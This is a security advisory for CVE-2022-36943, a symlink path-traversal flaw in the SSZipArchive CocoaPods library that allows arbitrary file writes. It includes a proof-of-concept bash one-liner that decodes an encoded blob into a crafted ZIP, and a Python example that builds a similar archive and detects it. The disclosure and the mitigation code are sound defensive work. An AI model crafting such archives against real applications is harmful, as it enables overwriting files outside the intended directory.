SSZipArchive Arbitrary File Write Vulnerability

Critical
landaire published GHSA-vgvw-6xcf-qqfc Jan 3, 2023

Package

SSZipArchive (CocoaPods)

Affected versions

<=2.5.3

Patched versions

None

Description

Vulnerability Description:

SSZipArchive typically sanitizes file paths to ensure that no files are written outside of the provided destination directory argument. However, symlinks are also supported and have no sanitization checks performed on the symlink's target path.

An attacker can therefore place a symlink pointing to a location of their choosing as the first entry in the ZIP archive, so that the symlink is created before anything else. If a later regular file in the ZIP has the same name as the symlink, the library opens that path with an fopen() call, which implicitly follows the symlink, and the file's contents are written to the symlink's target.

An example file may look like the following, where the first entry is a symlink whose target is ../test:

$ unzip -v ./symlink_escape.zip
Archive:  ./symlink_escape.zip
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
--------  ------  ------- ---- ---------- ----- --------  ----
       7  Stored        7   0% 06-30-2022 06:14 85e2e03c  test
       5  Defl:N        7 -40% 06-30-2022 06:14 3610a686  test
--------          -------  ---                            -------
      12               14 -17%                            2 files

Proof of Concept:

The following bash command decodes the base64 text and decompresses the resulting .xz data, producing a maliciously crafted ZIP archive.

echo -n "/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ADLAFxdACgSvGAol9VpzGR79fbdQZYxkTvx1S6doFjMMPFDEMyTmKrcgRgnOk+lDGZg51l0XJsdSne7oHE79HfM7ZzptavRzCqA5+gmfZMSfAeYDS+4bGvA2k6hII8S2qgAAMU3KxoPPYbUAAF4zAEAAADOOX2wscRn+wIAAAAABFla" | base64 -d | xz -d > symlink_escape.zip

The symlink_escape.zip file can then be used in any application that handles a ZIP archive using SSZipArchive, including the library's own sample applications. After unzipping completes, a file named test containing hello will have been written to the parent of the destination directory.

Recommendation:

Add path sanitization checks to the symlink's target to ensure it's a subdirectory of the destination path. Symlinks which are not relative to the destination path should be ignored unless the user explicitly requests it.
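The check recommended above, written as an added Python example (not SSZipArchive code): it resolves each symlink entry's target against the destination directory and flags targets that escape it, and separately flags a later entry that reuses a symlink's name, the pattern in the listing above. The destination path /tmp/extract and the in-memory sample archive are constructed for the example.

```python
import io
import os
import stat
import zipfile


def build_sample_archive():
    """Constructed sample mirroring the advisory's listing: a symlink entry
    "test" -> "../test" followed by a regular file also named "test"."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        link = zipfile.ZipInfo("test")
        # ZIP stores the Unix mode in the high 16 bits of external_attr.
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "../test")      # a symlink entry's body is its target path
        zf.writestr("test", "hello\n")    # regular file that would be written through the link
    return buf.getvalue()


def is_symlink(info):
    return stat.S_ISLNK(info.external_attr >> 16)


def target_escapes(dest, entry_name, target):
    """True if a symlink created at dest/entry_name pointing at target would
    resolve outside dest. Absolute targets always escape."""
    dest = os.path.realpath(dest)
    if os.path.isabs(target):
        return True
    link_dir = os.path.dirname(os.path.join(dest, entry_name))
    resolved = os.path.normpath(os.path.join(link_dir, target))
    return os.path.commonpath([dest, resolved]) != dest


def find_escaping_symlinks(zip_bytes, dest):
    """Return (entry_name, target) for each symlink entry whose target resolves outside dest."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink(info):
                target = zf.read(info).decode("utf-8", "replace")
                if target_escapes(dest, info.filename, target):
                    findings.append((info.filename, target))
    return findings


def find_symlink_name_reuse(zip_bytes):
    """Return names of non-symlink entries that reuse the name of an earlier symlink entry."""
    seen_links, reused = set(), []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_symlink(info):
                seen_links.add(info.filename)
            elif info.filename in seen_links:
                reused.append(info.filename)
    return reused
```

Running both checks before handing an archive to the extractor, and skipping any flagged symlink entry, gives the behaviour the recommendation asks for.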

Severity

Critical

CVE ID

CVE-2022-36943

Credits